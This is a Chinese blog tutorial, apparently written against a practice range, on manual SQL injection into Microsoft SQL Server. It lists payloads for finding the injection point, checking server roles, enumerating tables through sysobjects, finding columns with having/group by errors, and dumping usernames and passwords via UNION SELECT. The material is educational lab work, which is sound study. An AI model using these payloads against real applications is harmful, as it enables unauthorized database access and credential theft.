MSSQL 手工注入(第一关)

于 2024-08-24 14:49:55 发布
阅读量1.3k 收藏 21
点赞数 42
文章标签: sqlserver 服务器 数据库 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishiqi12/article/details/141465947
版权

简介

     SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、判断注入点权限

select is_srvrolemember('sysadmin'); 判断当前是否为 sa

select is_srvrolemember('db_owner'); 判断当前⽤户写⽂件、读⽂件的权限

select is_srvrolemember('public'); 判断是否有 public 权限,可以爆破表

 ' and exists(select is_srvrolemember('sysadmin'))--   判断当前是否为 sa

或 ' and (select is_srvrolemember('sysadmin'))>0--  判断当前是否为 sa

' and (select is_srvrolemember('db_owner'))>0--  判断当前⽤户写⽂件 / 读⽂件的权限

四、查询数据库信息

user: 查询⽤户

db_name(): 查询数据库名

@@version: 查询版本信息

使用语句 ?id=-1'union select 1,user,is_srvrolemember('public');--+  查询用户

使用语句 ?id=-1'union select 1,@@version,is_srvrolemember('public');--+  查询版本信息

五、查询表名

1、查询第一个表名

使用语句  'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order by id desc)=1--

2、查询第二个表名

使用语句  -1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--

3、查询第三个表名

使用语句  -1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')--

4、查询第四个表名

使用语句     -1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--

5、查询第五个表名

使用语句   -1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents' and name !='referers')--

结果为空,则共有四个表

六、确定字段信息

1、确定第一个字段为id

使用语句   'having 1=1--

2、确定第二个字段为username

使用语句  'group by id having 1=1--

3、确定第三个字段为password

使用语句   'group by id ,username having 1=1--

使用语句   'group by id ,username,password having 1=1--

最终确定只有三个字段

七、确定字段内容

1、查询字段数据

1'order by 3-- // 回显正常

1'order by 4-- // 回信错误 #

2、回显存在内容的字段

使用语句   -1'union select 1,2,3 from users--

确定为 2、3

3、 查询字段内容

使用语句   -1' union select 1,username,password from users--+

安全

网络安全靠人民,网络安全为人民 

白十七12
关注
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
MSSQL数据库系统(一)
txd1123的博客
06-21 2387
MSsql基础操作MSSQL是大步份版本收费的关系型数据库服务器软件,SQL Server主要在常见的互联网公司使用。2016年推出 linux版。由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端,需要有关于MS SQL Server的渊博知识。安装包位置:https://packages.microsoft.com//rhel/7/
MSSQL数据库系统
Hdvsns的博客
06-26 1593
由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端,需要有关于MS SQL Server的渊博知识。我们这次用的是mssql-server-preview/下的mssql-server-15.0.1100.94-1.x86_64.rpm。4.选择开发版2和简体中文10,并输入sa(mssql的系统管理账号)用的较复杂密码两遍(建议用Aa123456)mssql-tools安装目录加入系统路径(未关机生效)。1.进入安装目的目录/opt/mssql/bin/
MSSQL存储过程的功能和用法(很详细)
book_dw5189的博客
06-17 2811
MSSQL存储过程的功能和用法(很详细)
mssql(1433端口)介绍
山兔的博客
12-04 3592
Microsoft SQL Server是一个关系型数据库,微软开发的管理系统。作为数据库服务器,它是一种软件产品,其主要功能是存储和检索其他软件应用程序所请求的数据,这些应用程序可以运行在同一台计算机上,也可以运行在网络(包括Internet)上的另一台计算机上。默认运行在1433端口master Database:记录SQL Server实例的所有系统级信息。msdb Database:由SQL Server代理用于安排警报和作业。model Database:用作在SQL Server实例上创建的所有
MSSQL注入笔记
春日野穹
02-28 1095
最近在学习MSSQL注入,以前注入的知识全都忘记了,甚至连MSSQL语句都不认识了,非常尴尬,趁着周末有时间,便重新复习了一下,并写个笔记。 写的比较乱,有时间再重新整理一下 2021.2.28 15.48.55 MSSQL基础知识 SQL Server默认库的介绍 初始库有4个 master master 数据库记录了所有的 SQL Server 数据库系统的系统级信息,如用户帐户,配置设置,并在所有其他数据库信息。 model model 数据库是一个模板数据库。每当创建一个新的数据库(包括系统数据
PHP+MySQL 手工注入语句大全 推荐
10-29
标题中提到的“PHP+MySQL手工注入语句大全推荐”以及描述中提到的“PHP MYSQL手工注射”的知识点主要包括了如何利用SQL注入技术在PHP开发的网站中,通过MySQL数据库的漏洞来获取敏感信息或控制系统。由于这些操作在...
sql server 2008 mysql 手工注入
03-25
手工注入,特别是SQL注入,是一种常见的安全漏洞,它允许攻击者通过构造恶意SQL语句来操纵或获取数据库中的敏感信息。在这个主题中,我们将深入探讨这两种数据库系统的SQL注入及其防范方法。 首先,SQL注入的原理是...
PHP+MYSQL 注入靶场
最新发布
04-26
SQL注入通常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入点至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来...
Mssql安装使用
学海无涯,我用JAVA
09-25 566
我之前用过sql server,后来使用频率较少,最近有开始接触了,顺便整理下笔记,为后续准备~mssql 也是遵循sql92标准的,所以语法基本与mysql 等都是一致的,部分函数,关键字用法不一致,还有一些数据类型, 函数等;
MS SQL数据库
分享我的点点滴滴,在成长路上与你同行!
12-28 3737
一、数据库能做哪些?         1)存储大量数据,方便检索和访问    2)保持数据信息的一致、完整    3)共享和安全    4)通过组合分析,产生新的有用信息 二、数据库是什么?       1) 数据库就是“数据”的“仓库”。    2)数据库中包含表、关系以及操作对象    3)数据存放在表中 三、mssql数据库是什么
个人MSSQL总结及收集
qq_36334672的博客
02-05 1092
*Sysobjects表: **SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、 默认值、日志、规则、存储过程等,每个对象在表中占一行。**Name, id, xtype, uid, status: **分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
MSSQL 存储过程:功能和用法详解
naer_chongya的博客
12-16 1192
MSSQL 存储过程是一种在 Microsoft SQL Server 数据库中存储和执行代码的强大工具。本文将详细介绍 MSSQL 存储过程的功能和用法,包括定义和创建存储过程、参数的使用、事务控制、错误处理以及优点和示例等方面,帮助读者更好地了解和运用 MSSQL 存储过程。
MSSQL存储过程的功能和用法
随机指定的博客
12-09 612
Microsoft SQL Server (MSSQL) 的存储过程是一组为了完成特定任务而预先编译好的 SQL 语句。它们在数据库系统中非常重要,因为它们提供了一种强大且灵活的方式来执行复杂的数据库操作。
MSSQL基本使用
技术超强的网络安全平台
12-01 6724
0x00 简介 Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system,为了迎合新的版本我接下来的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给我们注入过程带来了便利,所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。 0x01 默认库的介绍 master
SQL Server】数据库开发指南(二)MSSQL数据库开发对于库、表、数据类型、约束等相关操作
我在山城重庆,我希望能为这片软件沙漠地带贡献自己的一滴水,Stay tuned!
04-05 3072
SQL Server数据库开发对于库、表、数据类型、约束等相关介绍 除了精确数字类型之外,SQL Server 还提供了近似数字类型,可以存储小数点后面一定位数的数字,但是不保证完全准确,因为存储的值会被截断或四舍五入。主数据文件是数据库的主要数据文件,包含数据库的系统表和用户数据。次数据文件是包含用户数据的文件,可以帮助扩展数据库的存储容量并提高性能。是 T-SQL 中的一种分隔符,用于将批处理中的 T-SQL 语句分成多个批次。
MSSQL数据库基础
qq_44021627的博客
06-27 1218
Microsoft SQL Server 上的每个数据库在表中占一行。最初安装 SQL Server 时,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。这个表保存在master数据库中,这个表中保存的是什么信息呢?他是保存了所有的库名,以及库的ID,和一些相关信息。dbid从1到5是系统的。分别是:master、model、msdb、mssqlweb、tempdb 这五个库.
MySQL手工注入技术详解
MySQL手工注入是一种网络安全漏洞,主要针对使用MySQL数据库的Web应用程序。这种攻击方式允许攻击者通过输入恶意SQL语句来获取或篡改数据库中的敏感信息,甚至控制整个数据库系统。在本文档中,讲解的是针对MySQL ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值